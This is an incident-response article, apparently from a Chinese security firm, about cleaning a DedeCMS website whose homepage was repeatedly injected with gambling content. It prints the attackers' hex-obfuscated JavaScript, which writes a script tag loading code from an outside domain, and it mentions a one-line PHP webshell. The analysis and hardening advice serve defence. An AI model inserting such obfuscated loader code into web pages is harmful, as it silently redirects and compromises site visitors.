如何解决网站首页老被黑客篡改并被百度安全中心拦截提示 该页面存在木马病毒的实战过程-阿里云开发者社区

开发者社区> 网站安全> 正文

如何解决网站首页老被黑客篡改并被百度安全中心拦截提示 该页面存在木马病毒的实战过程

简介: 2018.6.19当天接到一位新客户反映自己的网站被黑了,网站首页也被黑客篡改了,网站首页被加了一些与网站不相符的内容与加密的代码,导致百度网址安全中心提醒您:该页面可能存在木马病毒!网站在百度的收录与快照也被劫持成什么世...
+关注继续查看

2018.6.19当天接到一位新客户反映自己的网站被黑了,网站首页也被黑客篡改了,网站首页被加了一些与网站不相符的内容与加密的代码,导致百度网址安全中心提醒您:该页面可能存在木马病毒!网站在百度的收录与快照也被劫持成什么世界杯投注,以及博彩,赌博等等的内容,根据以上客户给我们反映的网站被黑的问题,我们Sine安全公司立即安排安全技术人员对客户网站被黑的情况进行了详细的网站安全检测与代码的人工安全审计,发现客户网站首页之前是经常的被篡改,客户只能删除掉首页文件,然后重新生成首页,实在是反复被篡改的没办法了,才找到我们SINE安全公司来处理网站的安全问题.

一.网站被黑的状况分析

1.客户的网站采用的是,织梦DEDECMS系统(PHP+MYSQL数据库架构),dedecms漏洞在近几年实在是爆出了太多,但是现在用dedecms做网站以及平台的也很多,一般企业站或做优化排名的网站都是用这个织梦的程序来做,优化快,访问速度也快,全站可以静态文件生成,方便管理更新文章,也方便网站打开的速度,以及关键词方面的优化与提升。通过与客户的沟通了解,发现客户的网站,只要是发布新的文章,并在后台生成新的html页面,或者生成首页index.html,就会被攻击者直接增加了一些加密的代码与赌博的内容,图片如下:

网站被篡改的内容都是加了一些什么,极速赛车,赌博,博彩、赌球,世界杯投注的与网站不相关的内容,而且这个网站代码还做了JS判断跳转,针对于Baidu搜索来的客户,会直接跳转到这个极速赛车、赌博、博彩的页面,导致360提示博彩网站拦截,百度提示风险拦截的图片如下:

网站在百度的搜索中会直接风险提示:百度网址安全中心提醒你:该页面可能存在木马病毒。

通过对客户网站的所有代码的安全检测与代码的人工安全审计,发现网站首页index.html中的内容被篡改,并发现在dedecms模板目录文件下的index.htm文件也被篡改了。

我们来打开index.htm模板文件,看下代码:

下面的这一段代码是加密的JS跳转代码,是根据百度搜索等相应的条件,进行判断,然后跳转,直接输入网站域名不会跳转。

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x38\x30\x30\x30\x6b\x61\x69\x2e\x63\x6f\x6d\x2f\x73\x74\x61\x74\x69\x63\x2f\x6a\x73\x2f\x38\x30\x30\x30\x6b\x61\x69\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');

上面查到一些加密的代码,用编码的解密查到,是一些博彩与赌球相关的内容,我们把生成首页后被篡改的内容直接删除掉,然后对其网站里留存下来的木马病毒,以及木马后门进行清除,并做好网站的漏洞检测与漏洞修复,部署网站防篡改方案。

二.网站被黑的清理过程记录

1.网站经过SINE安全技术的安全审计后,在安全的处理过程中发现网站根目录下的datas.php文件内容属于assert类型的一句话木马。

那么既然发现有一句话木马,那肯定是存在PHP脚本木马的,随即发现在css目录下有个文件是加密的代码,我们访问该木马地址,进行了访问发现的确是木马病毒的,所在图片如下:

该PHP脚本木马的操作权限实在是太大了,对文件的编辑以及改名,以及执行恶意的sql语句,查看服务器的系统信息都可以看的很清楚.对网站的所有程序代码,进行了木马特征扫描,发现了N个网站木马文件,怪不得客户自己说反反复复的出现被黑,网站被篡改的都快要吐血了。扫描到的木马病毒如下图所示:

这么多个脚本木马后门,我们安全技术直接进行了全部删除清理,由于客户网站用的是单独的服务器。那么对服务器的安全也要进行详细的安全加固和网站安全防护,查看到网站的mysql数据库,分配给网站使用的是root权限,(用root管理员权限会导致整个服务器都会被黑,增加了攻击风险)我们给客户服务器增加了一个普通权限的数据库账户分配给网站,数据库的端口3306以及135端口445端口139端口都进行了端口安全策略部署,杜绝外网一切连接,只允许内网连接,对服务器进行了详细的服务器安全设置和部署,后续我们对网站的所有文件,代码,图片,数据库里的内容,进行了详细的安全检测与对比,从SQL注入测试、XSS跨站安全测试、表单绕过、文件上传漏洞测试、文件包含漏洞检测、网页挂马、网页后门木马检测、包括一句话小马、aspx大马、脚本木马后门、敏感信息泄露测试、任意文件读取、目录遍历、弱口令安全检测等方面进行了全面的安全检测,与漏洞修复,至此客户网站被黑的问题才得以完美的解决。因为之前客户都是平均一天被篡改两三次,从做安全部署到今天20号,客户网站访问一切正常,没有被篡改

三.针对于网站被黑的防护建议

1.定期的更新服务器系统漏洞(windows 2008 2012、linux centos系统),网站系统升级,尽量不适用第三方的API插件代码。

2.如果自己对程序代码不是太了解的话,建议找网站安全公司去修复网站的漏洞,以及代码的安全检测与木马后门清除,国内推荐SINE安全公司、绿盟安全公司、启明星辰等的网站安全公司,做深入的网站安全服务,来保障网站的安全稳定运行,防止网站被挂马之类的安全问题。

3.尽量不要把网站的后台用户的密码设置的太简单化,要符合10到18位的大小写字母+数字+符号组合。

4.网站后台管理的路径一定不能用默认的admin或guanli或manage 或文件名为admin.asp的路径去访问。

5.服务器的基础安全设置必须要详细的做好,端口的安全策略,注册表安全,底层系统的安全加固,否则服务器不安全,网站再安全也没用。

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
linux系统 网站木马后门Webshell查杀工具源码
后门这东西好让人头疼,第一文件太多了,不容易找,第二,难找,需要特征匹配啊。搞了一个python版查杀php webshell后门工具,大家可以增加后门的特征码,然后甩到后台给他查杀就可以了。
2889 0
DNN安装报错-The stored procedure 'dbo.GetPortalAliasByPortalID' doesn't exist.如何解决
因为出错代码比较长,就放在后面了。 出现"The stored procedure 'dbo.GetPortalAliasByPortalID' doesn't exist."报错的情况很多 只要是安装过程中出现异常终止,然后我们又试图访问没有安装好的网站(因为是装了一半终止的,所以DNN不会再触发安装的过程); 或者其它的设置导致DNN不能正常运行就有可能出现这个报错。
670 0
Confluence 6 从站点首页集中访问面板
如果你选择设置一个页面为你的站点主页面,但是你还是希望你的用户能够访问 Confluence 的主面板,你可以将主面板的连接添加到应用导航(Application Navigator)中。
920 0
木马频繁造假 伪装成多个安全软件钓鱼
拿到一个“半成品”样本,病毒在文件属性中假冒360安全卫士,但图标明显不对。   运行后,还会假冒毒霸的病毒警告:   这里看一下正常的毒霸实时监控发现病毒时的窗口:   伪造的还挺象那么回事儿,只是文字太多露出马脚。
594 0
网站安全问题针对一句话木马函数的普析与防范
本文内容转载于Sinesafe网站安全服务http://www.sinesafe.com/article/20180608/244.html PHP网站安全防一句话木马入侵 一、首先是菜刀一句话木马:     菜刀一句话木马的原理是调用了PHP的代码执行函数,比如以下1和2两个常见的一句话菜刀马,就是调用了eval函数、assert函数。
1899 0
5月安全新品播课(1)|混合云下割裂的Web安全管理挑战如何破?
阿里云WAF推出混合云安全解决方案,实现多云环境下的统一管理
263 0
+关注
网站安全
Sinesafe专注于网站安全,服务器安全,解决各类网络安全问题,对代码审计以及漏洞修补安全加固有专业的十年实战经验.官方站点www.sinesafe.com
130
文章
177
问答
文章排行榜
最热
最新
相关电子书
更多
文娱运维技术
立即下载
《SaaS模式云原生数据仓库应用场景实践》
立即下载
《看见新力量:二》电子书
立即下载